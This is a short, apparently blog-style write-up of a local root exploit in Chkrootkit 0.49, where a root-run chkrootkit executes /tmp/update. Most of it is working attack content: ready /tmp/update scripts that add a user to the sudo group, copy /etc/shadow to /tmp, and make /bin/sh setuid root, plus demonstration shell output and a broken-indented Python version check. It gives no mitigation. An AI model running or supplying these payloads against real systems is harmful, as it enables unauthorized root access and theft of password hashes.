Local root exploit in Chkrootkit

Security researchers have found an local exploit for Chkrootkit 0.49 who allow to a simple user to make root’s commands (the current Chkrootkit version is 0.50)

Proof of concept

When Chkrootkit is executed a file ‘/tmp/update’ is executed with the permissions of user who launched Chkrootkit .
For launch Chkrootkit we use sudo for run it as superuser like this

sudo chkrootkit

if we run it as a simple user like this :

hd@kali:/root$ chkrootkit
chkrootkit need root privileges

We must run Chkrookit as root , so the file ‘/tmp/update’ too .
Now we can create ‘/tmp/update’ for become root .

Privileges escalation

Make a user sudoer

#!/bin/bash
adduser bob sudo

Read /etc/shadow

#!/bin/bash
cat /etc/shadow > /tmp/shadow

and you read /tmp/shadow .

Get a root shell

#!/bin/bash
chown root:root /bin/sh ; chmod 4777 /bin/sh

For get a root shell you must execute ‘/bin/sh’

bash-4.4$ whoami
hd
bash-4.4$ /bin/sh
# whoami
root
#

Don’t forget to chmod ‘tmp/update’

chmod +x /tmp/update

End

'/tmp/update' is executed every time when Chkrootkit is executed so check the cron for find when chkrootkit is launched .
After this the content of '/tmp/update' file will be executed and you can become root or make command as root .

print("[*] checking if chkrootkit's version is vulnerable")
sortie = (commands.getoutput("{} -V ".format(chkrootkit)))
if "0.49" in (sortie):
print("[+] chkrootkit is vulnerable")
elif not "0.49" in (sortie):
print("[-] chkrootkit is not vulnerable")
sys.exit()